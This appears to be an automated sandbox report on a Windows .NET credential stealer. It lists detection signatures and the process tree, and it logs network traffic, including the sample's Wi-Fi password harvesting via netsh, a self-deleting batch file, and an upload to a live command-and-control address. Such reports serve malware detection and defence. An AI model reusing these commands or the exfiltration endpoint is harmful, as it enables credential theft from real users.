
Windows Analysis Report
3K5MXGVOJE.exe

Overview

General Information

Sample name: 3K5MXGVOJE.exe
Analysis ID: 1568316
MD5: 532e953689741622b91a29f7db4bcce0
SHA1: fbeb0bc18838b33caecfa429fec80431fc69c469
SHA256: dd503955140cfd86c1189e79bfd7b0c7b5ebc7ff7348fd9180486362614a880d

Detection

Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Multi AV Scanner detection for submitted file
Sigma detected: Capture Wi-Fi password
Suricata IDS alerts for network traffic
.NET source code references suspicious native API functions
Found many strings related to Crypto-Wallets (likely being stolen)
Machine Learning detection for sample
PE file contains section with special chars
Queries memory information (via WMI often done to detect virtual machines)
Queries pointing device information (via WMI, Win32_PointingDevice, often done to detect virtual machines)
Queries sensitive battery information (via WMI, Win32_Battery, often done to detect virtual machines)
Queries sensitive disk information (via WMI, Win32_DiskDrive, often done to detect virtual machines)
Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
Queries sensitive physical memory information (via WMI, Win32_PhysicalMemory, often done to detect virtual machines)
Queries sensitive printer information (via WMI, Win32_Printer, often done to detect virtual machines)
Queries sensitive service information (via WMI, Win32_LogicalDisk, often done to detect sandboxes)
Queries sensitive sound device information (via WMI, Win32_SoundDevice, often done to detect virtual machines)
Tries to harvest and steal Bitcoin Wallet information
Tries to harvest and steal WLAN passwords
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Uses known network protocols on non-standard ports
Uses netsh to modify the Windows network and firewall settings
AV process strings found (often used to terminate AV products)
Allocates memory with a write watch (potentially for evading sandboxes)
Binary contains a suspicious time stamp
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Contains functionality to call native functions
Contains functionality to communicate with device drivers
Creates a process in suspended mode (likely to inject code)
Creates a window with clipboard capturing capabilities
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May check the online IP address of the machine
One or more processes crash
PE file contains sections with non-standard names
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the product ID of Windows
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Uses code obfuscation techniques (call, push, ret)
Uses taskkill to terminate processes
Yara detected Credential Stealer

Classification

  • System is w10x64native
  • 3K5MXGVOJE.exe (PID: 4236 cmdline: "C:\Users\user\Desktop\3K5MXGVOJE.exe" MD5: 532E953689741622B91A29F7DB4BCCE0)
    • cmd.exe (PID: 6304 cmdline: "cmd.exe" /c tasklist MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • conhost.exe (PID: 4316 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
      • tasklist.exe (PID: 4232 cmdline: tasklist MD5: 0A4448B31CE7F83CB7691A2657F330F1)
    • cmd.exe (PID: 2596 cmdline: "cmd" /C chcp 65001 && netsh wlan show profiles | findstr All MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • conhost.exe (PID: 2476 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
      • chcp.com (PID: 2356 cmdline: chcp 65001 MD5: 41146159AA3D41A92B53ED311EE15693)
      • netsh.exe (PID: 6768 cmdline: netsh wlan show profiles MD5: 4E89A1A088BE715D6C946E55AB07C7DF)
      • findstr.exe (PID: 7788 cmdline: findstr All MD5: F1D4BE0E99EC734376FDE474A8D4EA3E)
    • cmd.exe (PID: 1360 cmdline: "C:\Windows\System32\cmd.exe" /C C:\Users\user\AppData\Local\Temp\tmp3937.tmp.bat & Del C:\Users\user\AppData\Local\Temp\tmp3937.tmp.bat MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • conhost.exe (PID: 1892 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
      • chcp.com (PID: 6132 cmdline: chcp 65001 MD5: 41146159AA3D41A92B53ED311EE15693)
      • taskkill.exe (PID: 6708 cmdline: TaskKill /F /IM 4236 MD5: CA313FD7E6C2A778FFD21CFB5C1C56CD)
      • timeout.exe (PID: 4880 cmdline: Timeout /T 2 /Nobreak MD5: 976566BEEFCCA4A159ECBDB2D4B1A3E3)
    • WerFault.exe (PID: 6812 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 4236 -s 3212 MD5: 40A149513D721F096DDF50C04DA2F01F)
  • cleanup
No configs have been found
Source | Rule | Description | Author | Strings
00000000.00000002.1061396393.0000000002CBD000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_CredentialStealer | Yara detected Credential Stealer | Joe Security |
Process Memory Space: 3K5MXGVOJE.exe PID: 4236 | JoeSecurity_CredentialStealer | Yara detected Credential Stealer | Joe Security |

      Stealing of Sensitive Information

      barindex
      Source: Process started; Author: Joe Security; Data: Command: "cmd" /C chcp 65001 && netsh wlan show profiles | findstr All, CommandLine: "cmd" /C chcp 65001 && netsh wlan show profiles | findstr All, CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\cmd.exe, NewProcessName: C:\Windows\SysWOW64\cmd.exe, OriginalFileName: C:\Windows\SysWOW64\cmd.exe, ParentCommandLine: "C:\Users\user\Desktop\3K5MXGVOJE.exe", ParentImage: C:\Users\user\Desktop\3K5MXGVOJE.exe, ParentProcessId: 4236, ParentProcessName: 3K5MXGVOJE.exe, ProcessCommandLine: "cmd" /C chcp 65001 && netsh wlan show profiles | findstr All, ProcessId: 2596, ProcessName: cmd.exe

      Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
      2024-12-04T14:54:04.616127+0100 | 2843856 | 1 | A Network Trojan was detected | 192.168.11.20 | 49712 | 89.23.100.233 | 1489 | TCP

      AV Detection

      barindex
      Source: 3K5MXGVOJE.exe; Avira: detected
      Source: 3K5MXGVOJE.exe; ReversingLabs: Detection: 50%
      Source: 3K5MXGVOJE.exe; Joe Sandbox ML: detected
      Source: 3K5MXGVOJE.exe; Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
      Source: Binary string: ntkrnlmp.pdbxC4 source: 3K5MXGVOJE.exe, 00000000.00000002.1068685690.000000000572B000.00000004.00000020.00020000.00000000.sdmp
      Source: Binary string: mscorlib.pdbMZ source: WER1843.tmp.dmp.18.dr
      Source: Binary string: System.Xml.ni.pdb source: WER1843.tmp.dmp.18.dr
      Source: Binary string: WINLOA~1.PDBwinload_prod.pdb source: 3K5MXGVOJE.exe, 00000000.00000002.1068685690.000000000572B000.00000004.00000020.00020000.00000000.sdmp
      Source: Binary string: System.ni.pdbRSDS source: WER1843.tmp.dmp.18.dr
      Source: Binary string: Stealer.pdb source: WER1843.tmp.dmp.18.dr
      Source: Binary string: System.Windows.Forms.ni.pdb source: 3K5MXGVOJE.exe, 00000000.00000002.1076558748.00000000712EB000.00000020.00000001.01000000.00000008.sdmp, WER1843.tmp.dmp.18.dr
      Source: Binary string: System.Drawing.ni.pdb source: 3K5MXGVOJE.exe, 00000000.00000002.1086311571.00000000714CB000.00000020.00000001.01000000.00000007.sdmp, WER1843.tmp.dmp.18.dr
      Source: Binary string: System.Configuration.ni.pdb source: WER1843.tmp.dmp.18.dr
      Source: Binary string: System.Net.Http.pdb source: WER1843.tmp.dmp.18.dr
      Source: Binary string: System.Security.pdb source: WER1843.tmp.dmp.18.dr
      Source: Binary string: rnlmp.pdb\* source: 3K5MXGVOJE.exe, 00000000.00000002.1059554645.0000000000D12000.00000004.00000020.00020000.00000000.sdmp
      Source: Binary string: \??\C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\tdataataa source: 3K5MXGVOJE.exe, 00000000.00000002.1071835301.000000000773E000.00000004.00000020.00020000.00000000.sdmp
      Source: Binary string: System.IO.Compression.pdb source: WER1843.tmp.dmp.18.dr
      Source: Binary string: \C#\Arcana\Stealer\obj\Release\Stealer.pdb source: 3K5MXGVOJE.exe
      Source: Binary string: System.Configuration.pdb source: WER1843.tmp.dmp.18.dr
      Source: Binary string: System.Drawing.ni.pdbRSDS source: 3K5MXGVOJE.exe, 00000000.00000002.1086311571.00000000714CB000.00000020.00000001.01000000.00000007.sdmp, WER1843.tmp.dmp.18.dr
      Source: Binary string: System.Xml.pdb source: WER1843.tmp.dmp.18.dr
      Source: Binary string: System.pdb source: WER1843.tmp.dmp.18.dr
      Source: Binary string: System.Xml.ni.pdbRSDS# source: WER1843.tmp.dmp.18.dr
      Source: Binary string: System.Core.ni.pdb source: WER1843.tmp.dmp.18.dr
      Source: Binary string: System.Windows.Forms.pdb source: 3K5MXGVOJE.exe, 00000000.00000002.1076558748.00000000712EB000.00000020.00000001.01000000.00000008.sdmp, WER1843.tmp.dmp.18.dr
      Source: Binary string: mscorlib.pdb source: WER1843.tmp.dmp.18.dr
      Source: Binary string: System.Management.ni.pdbRSDSJ< source: WER1843.tmp.dmp.18.dr
      Source: Binary string: System.Windows.Forms.ni.pdbRSDS source: 3K5MXGVOJE.exe, 00000000.00000002.1076558748.00000000712EB000.00000020.00000001.01000000.00000008.sdmp, WER1843.tmp.dmp.18.dr
      Source: Binary string: System.IO.Compression.pdbX$ source: WER1843.tmp.dmp.18.dr
      Source: Binary string: System.Net.Http.ni.pdb source: WER1843.tmp.dmp.18.dr
      Source: Binary string: System.Drawing.pdb source: 3K5MXGVOJE.exe, 00000000.00000002.1086311571.00000000714CB000.00000020.00000001.01000000.00000007.sdmp, WER1843.tmp.dmp.18.dr
      Source: Binary string: System.Management.pdb source: WER1843.tmp.dmp.18.dr
      Source: Binary string: \??\C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\tdatata source: 3K5MXGVOJE.exe, 00000000.00000002.1068685690.00000000057BF000.00000004.00000020.00020000.00000000.sdmp
      Source: Binary string: mscorlib.ni.pdb source: WER1843.tmp.dmp.18.dr
      Source: Binary string: System.Management.ni.pdb source: WER1843.tmp.dmp.18.dr
      Source: Binary string: System.Core.pdb source: WER1843.tmp.dmp.18.dr
      Source: Binary string: mscorlib.ni.pdbRSDS] source: WER1843.tmp.dmp.18.dr
      Source: Binary string: System.Configuration.ni.pdbRSDScUN source: WER1843.tmp.dmp.18.dr
      Source: Binary string: System.Net.Http.ni.pdbRSDS source: WER1843.tmp.dmp.18.dr
      Source: Binary string: System.ni.pdb source: WER1843.tmp.dmp.18.dr
      Source: Binary string: System.Core.ni.pdbRSDS source: WER1843.tmp.dmp.18.dr

      Networking

      barindex
      Source: Network traffic; Suricata IDS: 2843856 - Severity 1 - ETPRO MALWARE Suspicious Zipped Filename in Outbound POST Request (screenshot.) M2 : 192.168.11.20:49712 -> 89.23.100.233:1489
      Source: unknown; Network traffic detected: HTTP traffic on port 49712 -> 1489
      Source: unknown; Network traffic detected: HTTP traffic on port 1489 -> 49712
      Source: global traffic; TCP traffic: 192.168.11.20:49712 -> 89.23.100.233:1489
      Source: global traffic; HTTP traffic detected: GET / HTTP/1.1 | Host: icanhazip.com | Connection: Keep-Alive
      Source: global traffic; HTTP traffic detected: POST /upload HTTP/1.1 | Content-Type: multipart/form-data; boundary="84b32282-3d72-4c2c-a4cc-4a340d632b96" | Host: 89.23.100.233:1489 | Content-Length: 132449 | Expect: 100-continue | Connection: Keep-Alive
      Source: Joe Sandbox View; IP Address: 89.23.100.233
      Source: Joe Sandbox View; IP Address: 104.16.185.241
      Source: Joe Sandbox View; ASN Name: MAXITEL-ASRU
      Source: unknown; DNS query: name: icanhazip.com
      Source: unknown; TCP traffic detected without corresponding DNS query: 89.23.100.233
      Source: unknown; UDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: global traffic; DNS traffic detected: DNS query: icanhazip.com
      Source: global traffic; DNS traffic detected: DNS query: 90.168.9.0.in-addr.arpa
      Source: unknown; HTTP traffic detected: POST /upload HTTP/1.1 | Content-Type: multipart/form-data; boundary="84b32282-3d72-4c2c-a4cc-4a340d632b96" | Host: 89.23.100.233:1489 | Content-Length: 132449 | Expect: 100-continue | Connection: Keep-Alive
      Source: 3K5MXGVOJE.exe, 00000000.00000002.1061396393.0000000002D59000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: http://89.23.100.233:1489
      Source: 3K5MXGVOJE.exe, 00000000.00000002.1061396393.0000000002D59000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: http://89.23.100.233:1489/uploadt
      Source: 3K5MXGVOJE.exe, 00000000.00000002.1076558748.0000000070BD1000.00000020.00000001.01000000.00000008.sdmp; String found in binary or memory: http://beta.visualstudio.net/net/sdk/feedback.asp
      Source: 3K5MXGVOJE.exe, 00000000.00000002.1061396393.0000000002CBD000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: http://icanhazip.com
      Source: 3K5MXGVOJE.exe, 00000000.00000002.1061396393.0000000002CBD000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: http://icanhazip.com/
      Source: 3K5MXGVOJE.exe, 00000000.00000002.1061396393.0000000002CBD000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
      Source: Amcache.hve.18.dr; String found in binary or memory: http://upx.sf.net
      Source: tmpF56F.tmp.dat.0.dr; String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
      Source: tmpF56F.tmp.dat.0.dr; String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
      Source: tmpF56F.tmp.dat.0.dr; String found in binary or memory: https://duckduckgo.com/ac/?q=
      Source: 3K5MXGVOJE.exe, 00000000.00000002.1064806844.0000000003E52000.00000004.00000800.00020000.00000000.sdmp, 3K5MXGVOJE.exe, 00000000.00000002.1064806844.0000000003D07000.00000004.00000800.00020000.00000000.sdmp, 3K5MXGVOJE.exe, 00000000.00000002.1064806844.0000000003E7C000.00000004.00000800.00020000.00000000.sdmp, 3K5MXGVOJE.exe, 00000000.00000002.1064806844.0000000003D62000.00000004.00000800.00020000.00000000.sdmp, 3K5MXGVOJE.exe, 00000000.00000002.1072336540.00000000078AC000.00000004.00000020.00020000.00000000.sdmp, 3K5MXGVOJE.exe, 00000000.00000002.1064806844.0000000003E9A000.00000004.00000800.00020000.00000000.sdmp, 3K5MXGVOJE.exe, 00000000.00000002.1064806844.0000000003EB8000.00000004.00000800.00020000.00000000.sdmp, tmpF54B.tmp.dat.0.dr, tmpF572.tmp.dat.0.dr, tmpF54C.tmp.dat.0.dr, tmpF571.tmp.dat.0.dr, tmpF54D.tmp.dat.0.dr, tmpF56F.tmp.dat.0.dr; String found in binary or memory: https://duckduckgo.com/chrome_newtab
      Source: tmpF56F.tmp.dat.0.dr; String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
      Source: tmpF56F.tmp.dat.0.dr; String found in binary or memory: https://gemini.google.com/app?q=
      Source: tmpF570.tmp.dat.0.dr; String found in binary or memory: https://login.live.com/
      Source: 3K5MXGVOJE.exe, 00000000.00000002.1061396393.0000000002D59000.00000004.00000800.00020000.00000000.sdmp, tmpF570.tmp.dat.0.dr; String found in binary or memory: https://login.live.com//
      Source: 3K5MXGVOJE.exe, 00000000.00000002.1061396393.0000000002D59000.00000004.00000800.00020000.00000000.sdmp, tmpF570.tmp.dat.0.dr; String found in binary or memory: https://login.live.com/https://login.live.com/
      Source: 3K5MXGVOJE.exe, 00000000.00000002.1061396393.0000000002D59000.00000004.00000800.00020000.00000000.sdmp, tmpF570.tmp.dat.0.dr; String found in binary or memory: https://login.live.com/v104
      Source: 3K5MXGVOJE.exe, 00000000.00000002.1064806844.0000000003E52000.00000004.00000800.00020000.00000000.sdmp, 3K5MXGVOJE.exe, 00000000.00000002.1064806844.0000000003D07000.00000004.00000800.00020000.00000000.sdmp, 3K5MXGVOJE.exe, 00000000.00000002.1064806844.0000000003E7C000.00000004.00000800.00020000.00000000.sdmp, 3K5MXGVOJE.exe, 00000000.00000002.1064806844.0000000003D62000.00000004.00000800.00020000.00000000.sdmp, 3K5MXGVOJE.exe, 00000000.00000002.1072336540.00000000078AC000.00000004.00000020.00020000.00000000.sdmp, 3K5MXGVOJE.exe, 00000000.00000002.1064806844.0000000003E9A000.00000004.00000800.00020000.00000000.sdmp, 3K5MXGVOJE.exe, 00000000.00000002.1064806844.0000000003EB8000.00000004.00000800.00020000.00000000.sdmp, tmpF54B.tmp.dat.0.dr, tmpF572.tmp.dat.0.dr, tmpF54C.tmp.dat.0.dr, tmpF571.tmp.dat.0.dr, tmpF54D.tmp.dat.0.dr, tmpF56F.tmp.dat.0.dr; String found in binary or memory: https://uk.search.yahoo.com/favicon.icohttps://uk.search.yahoo.com/search
      Source: 3K5MXGVOJE.exe, 00000000.00000002.1064806844.0000000003E52000.00000004.00000800.00020000.00000000.sdmp, 3K5MXGVOJE.exe, 00000000.00000002.1064806844.0000000003D07000.00000004.00000800.00020000.00000000.sdmp, 3K5MXGVOJE.exe, 00000000.00000002.1064806844.0000000003E7C000.00000004.00000800.00020000.00000000.sdmp, 3K5MXGVOJE.exe, 00000000.00000002.1064806844.0000000003D62000.00000004.00000800.00020000.00000000.sdmp, 3K5MXGVOJE.exe, 00000000.00000002.1072336540.00000000078AC000.00000004.00000020.00020000.00000000.sdmp, 3K5MXGVOJE.exe, 00000000.00000002.1064806844.0000000003E9A000.00000004.00000800.00020000.00000000.sdmp, 3K5MXGVOJE.exe, 00000000.00000002.1064806844.0000000003EB8000.00000004.00000800.00020000.00000000.sdmp, tmpF54B.tmp.dat.0.dr, tmpF572.tmp.dat.0.dr, tmpF54C.tmp.dat.0.dr, tmpF571.tmp.dat.0.dr, tmpF54D.tmp.dat.0.dr, tmpF56F.tmp.dat.0.dr; String found in binary or memory: https://uk.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
      Source: 3K5MXGVOJE.exe, 00000000.00000002.1064806844.0000000003E52000.00000004.00000800.00020000.00000000.sdmp, 3K5MXGVOJE.exe, 00000000.00000002.1064806844.0000000003D07000.00000004.00000800.00020000.00000000.sdmp, 3K5MXGVOJE.exe, 00000000.00000002.1064806844.0000000003D62000.00000004.00000800.00020000.00000000.sdmp, 3K5MXGVOJE.exe, 00000000.00000002.1072336540.00000000078AC000.00000004.00000020.00020000.00000000.sdmp, tmpF572.tmp.dat.0.dr, tmpF571.tmp.dat.0.dr, tmpF56F.tmp.dat.0.dr; String found in binary or memory: https://www.ecosia.org/newtab/
      Source: 3K5MXGVOJE.exe, 00000000.00000002.1064806844.0000000003E52000.00000004.00000800.00020000.00000000.sdmp, 3K5MXGVOJE.exe, 00000000.00000002.1064806844.0000000003D07000.00000004.00000800.00020000.00000000.sdmp, 3K5MXGVOJE.exe, 00000000.00000002.1064806844.0000000003D62000.00000004.00000800.00020000.00000000.sdmp, 3K5MXGVOJE.exe, 00000000.00000002.1072336540.00000000078AC000.00000004.00000020.00020000.00000000.sdmp, tmpF572.tmp.dat.0.dr, tmpF571.tmp.dat.0.dr, tmpF56F.tmp.dat.0.dr; String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_alldp.ico
      Source: 3K5MXGVOJE.exe, 00000000.00000002.1064806844.0000000003E7C000.00000004.00000800.00020000.00000000.sdmp, 3K5MXGVOJE.exe, 00000000.00000002.1064806844.0000000003E9A000.00000004.00000800.00020000.00000000.sdmp, 3K5MXGVOJE.exe, 00000000.00000002.1064806844.0000000003EB8000.00000004.00000800.00020000.00000000.sdmp, tmpF54B.tmp.dat.0.dr, tmpF54C.tmp.dat.0.dr, tmpF54D.tmp.dat.0.dr; String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
      Source: C:\Users\user\Desktop\3K5MXGVOJE.exe; Window created: window name: CLIPBRDWNDCLASS

      System Summary

      barindex
      Source: 3K5MXGVOJE.exe; Static PE information: section name: .Nw
      Source: 3K5MXGVOJE.exe; Static PE information: section name: .T]1
      Source: C:\Users\user\Desktop\3K5MXGVOJE.exe; Code function: 0_2_05184D18 NtMapViewOfSection, 0_2_05184D18
      Source: C:\Users\user\Desktop\3K5MXGVOJE.exe; Code function: 0_2_05184750 NtAllocateVirtualMemory, 0_2_05184750
      Source: C:\Users\user\Desktop\3K5MXGVOJE.exe; Code function: 0_2_05184E08 NtQueryVolumeInformationFile, 0_2_05184E08
      Source: C:\Users\user\Desktop\3K5MXGVOJE.exe; Code function: 0_2_05184678 NtProtectVirtualMemory, 0_2_05184678
      Source: C:\Users\user\Desktop\3K5MXGVOJE.exe; Code function: 0_2_05184ED0 NtDeviceIoControlFile, 0_2_05184ED0
      Source: C:\Users\user\Desktop\3K5MXGVOJE.exe; Code function: 0_2_051841C0 NtClose, 0_2_051841C0
      Source: C:\Users\user\Desktop\3K5MXGVOJE.exe; Code function: 0_2_05184B70 NtCreateSection, 0_2_05184B70
      Source: C:\Users\user\Desktop\3K5MXGVOJE.exe; Code function: 0_2_05184A98 NtOpenFile, 0_2_05184A98
      Source: C:\Users\user\Desktop\3K5MXGVOJE.exe; Code function: 0_2_05184D11 NtMapViewOfSection, 0_2_05184D11
      Source: C:\Users\user\Desktop\3K5MXGVOJE.exe; Code function: 0_2_05184748 NtAllocateVirtualMemory, 0_2_05184748
      Source: C:\Users\user\Desktop\3K5MXGVOJE.exe; Code function: 0_2_05184E00 NtQueryVolumeInformationFile, 0_2_05184E00
      Source: C:\Users\user\Desktop\3K5MXGVOJE.exe; Code function: 0_2_05184670 NtProtectVirtualMemory, 0_2_05184670
      Source: C:\Users\user\Desktop\3K5MXGVOJE.exe; Code function: 0_2_05184EC8 NtDeviceIoControlFile, 0_2_05184EC8
      Source: C:\Users\user\Desktop\3K5MXGVOJE.exe; Code function: 0_2_051841B8 NtClose, 0_2_051841B8
      Source: C:\Users\user\Desktop\3K5MXGVOJE.exe; Code function: 0_2_05184B69 NtCreateSection, 0_2_05184B69
      Source: C:\Users\user\Desktop\3K5MXGVOJE.exe; Code function: 0_2_05184A91 NtOpenFile, 0_2_05184A91
      Source: C:\Users\user\Desktop\3K5MXGVOJE.exe; Code function: 0_2_05184ED0: NtDeviceIoControlFile, 0_2_05184ED0
      Source: C:\Users\user\Desktop\3K5MXGVOJE.exeCode function: 0_2_05DF18480_2_05DF1848
      Source: C:\Users\user\Desktop\3K5MXGVOJE.exeCode function: 0_2_05DF13F00_2_05DF13F0
      Source: C:\Users\user\Desktop\3K5MXGVOJE.exeCode function: 0_2_05DF03300_2_05DF0330
      Source: C:\Users\user\Desktop\3K5MXGVOJE.exeCode function: 0_2_05DF62C00_2_05DF62C0
      Source: C:\Users\user\Desktop\3K5MXGVOJE.exeCode function: 0_2_05DF92B80_2_05DF92B8
      Source: C:\Users\user\Desktop\3K5MXGVOJE.exeCode function: 0_2_05DFF2700_2_05DFF270
      Source: C:\Users\user\Desktop\3K5MXGVOJE.exeCode function: 0_2_05DFBC800_2_05DFBC80
      Source: C:\Users\user\Desktop\3K5MXGVOJE.exeCode function: 0_2_05DFB6E00_2_05DFB6E0
      Source: C:\Users\user\Desktop\3K5MXGVOJE.exeCode function: 0_2_05DFE90C0_2_05DFE90C
      Source: C:\Users\user\Desktop\3K5MXGVOJE.exeCode function: 0_2_05DFE8FC0_2_05DFE8FC
      Source: C:\Users\user\Desktop\3K5MXGVOJE.exeCode function: 0_2_05DFE8890_2_05DFE889
      Source: C:\Users\user\Desktop\3K5MXGVOJE.exeCode function: 0_2_05DFA0A80_2_05DFA0A8
      Source: C:\Users\user\Desktop\3K5MXGVOJE.exeCode function: 0_2_05DF00400_2_05DF0040
      Source: C:\Users\user\Desktop\3K5MXGVOJE.exeCode function: 0_2_05DF28780_2_05DF2878
      Source: C:\Users\user\Desktop\3K5MXGVOJE.exeCode function: 0_2_05DF00070_2_05DF0007
      Source: C:\Users\user\Desktop\3K5MXGVOJE.exeCode function: 0_2_05DFA03F0_2_05DFA03F
      Source: C:\Users\user\Desktop\3K5MXGVOJE.exeCode function: 0_2_05DF0B780_2_05DF0B78
      Source: C:\Users\user\Desktop\3K5MXGVOJE.exeCode function: 0_2_05DF0B680_2_05DF0B68
      Source: C:\Users\user\Desktop\3K5MXGVOJE.exeCode function: 0_2_06C784C00_2_06C784C0
      Source: C:\Users\user\Desktop\3K5MXGVOJE.exeCode function: 0_2_06C750F80_2_06C750F8
      Source: C:\Users\user\Desktop\3K5MXGVOJE.exeCode function: 0_2_06C79CAA0_2_06C79CAA
      Source: C:\Users\user\Desktop\3K5MXGVOJE.exeCode function: 0_2_06C708400_2_06C70840
      Source: C:\Users\user\Desktop\3K5MXGVOJE.exeCode function: 0_2_06C734500_2_06C73450
      Source: C:\Users\user\Desktop\3K5MXGVOJE.exeCode function: 0_2_06C7AA680_2_06C7AA68
      Source: C:\Users\user\Desktop\3K5MXGVOJE.exeCode function: 0_2_06C73C000_2_06C73C00
      Source: C:\Users\user\Desktop\3K5MXGVOJE.exeCode function: 0_2_06C735D30_2_06C735D3
      Source: C:\Users\user\Desktop\3K5MXGVOJE.exeCode function: 0_2_06C73FE00_2_06C73FE0
      Source: C:\Users\user\Desktop\3K5MXGVOJE.exeCode function: 0_2_06C75F800_2_06C75F80
      Source: C:\Users\user\Desktop\3K5MXGVOJE.exeCode function: 0_2_06C745880_2_06C74588
      Source: C:\Users\user\Desktop\3K5MXGVOJE.exeCode function: 0_2_06C701480_2_06C70148
      Source: C:\Users\user\Desktop\3K5MXGVOJE.exeCode function: 0_2_06C722E80_2_06C722E8
      Source: C:\Users\user\Desktop\3K5MXGVOJE.exeCode function: 0_2_06C74CF00_2_06C74CF0
      Source: C:\Users\user\Desktop\3K5MXGVOJE.exeCode function: 0_2_06C78A900_2_06C78A90
      Source: C:\Users\user\Desktop\3K5MXGVOJE.exeCode function: 0_2_06C784A70_2_06C784A7
      Source: C:\Users\user\Desktop\3K5MXGVOJE.exeCode function: 0_2_06C78AA00_2_06C78AA0
      Source: C:\Users\user\Desktop\3K5MXGVOJE.exeCode function: 0_2_06C7AA4F0_2_06C7AA4F
      Source: C:\Users\user\Desktop\3K5MXGVOJE.exeCode function: 0_2_06C750500_2_06C75050
      Source: C:\Users\user\Desktop\3K5MXGVOJE.exeCode function: 0_2_06C727C90_2_06C727C9
      Source: C:\Users\user\Desktop\3K5MXGVOJE.exeCode function: 0_2_06C777D60_2_06C777D6
      Source: C:\Users\user\Desktop\3K5MXGVOJE.exeCode function: 0_2_06C78FE80_2_06C78FE8
      Source: C:\Users\user\Desktop\3K5MXGVOJE.exeCode function: 0_2_06C73BF00_2_06C73BF0
      Source: C:\Users\user\Desktop\3K5MXGVOJE.exeCode function: 0_2_06C767BF0_2_06C767BF
      Source: C:\Users\user\Desktop\3K5MXGVOJE.exeCode function: 0_2_06C72B520_2_06C72B52
      Source: C:\Users\user\Desktop\3K5MXGVOJE.exeCode function: 0_2_06C763060_2_06C76306
      Source: C:\Users\user\Desktop\3K5MXGVOJE.exeCode function: 0_2_06C743000_2_06C74300
      Source: C:\Users\user\Desktop\3K5MXGVOJE.exeCode function: 0_2_06C72F160_2_06C72F16
      Source: C:\Users\user\Desktop\3K5MXGVOJE.exe | Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 4236 -s 3212
      Source: 3K5MXGVOJE.exe, 00000000.00000000.887300730.000000000081C000.00000002.00000001.01000000.00000003.sdmp | Binary or memory string: OriginalFilenameStealer.exeJ vs 3K5MXGVOJE.exe
      Source: 3K5MXGVOJE.exe, 00000000.00000002.1086311571.00000000714CB000.00000020.00000001.01000000.00000007.sdmp | Binary or memory string: OriginalFilenameSystem.Drawing.dllT vs 3K5MXGVOJE.exe
      Source: 3K5MXGVOJE.exe, 00000000.00000002.1086311571.00000000714CB000.00000020.00000001.01000000.00000007.sdmp | Binary or memory string: lastOriginalFileName vs 3K5MXGVOJE.exe
      Source: 3K5MXGVOJE.exe, 00000000.00000002.1059554645.0000000000CDE000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameclr.dllT vs 3K5MXGVOJE.exe
      Source: 3K5MXGVOJE.exe, 00000000.00000002.1076558748.00000000707CB000.00000020.00000001.01000000.00000008.sdmp | Binary or memory string: OriginalFilenameSystem.Windows.Forms.dllT vs 3K5MXGVOJE.exe
      Source: 3K5MXGVOJE.exe, 00000000.00000002.1061396393.0000000002CBD000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: OriginalFilename vs 3K5MXGVOJE.exe
      Source: 3K5MXGVOJE.exe | Binary or memory string: OriginalFilenameStealer.exeJ vs 3K5MXGVOJE.exe
      Source: 3K5MXGVOJE.exe | Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
      Source: classification engine | Classification label: mal100.troj.spyw.evad.winEXE@25/20@2/2
      Source: C:\Users\user\Desktop\3K5MXGVOJE.exe | Code function: 0_2_05DFD688 CreateToolhelp32Snapshot
      Source: C:\Users\user\Desktop\3K5MXGVOJE.exe | Mutant created: NULL
      Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4316:304:WilStaging_02
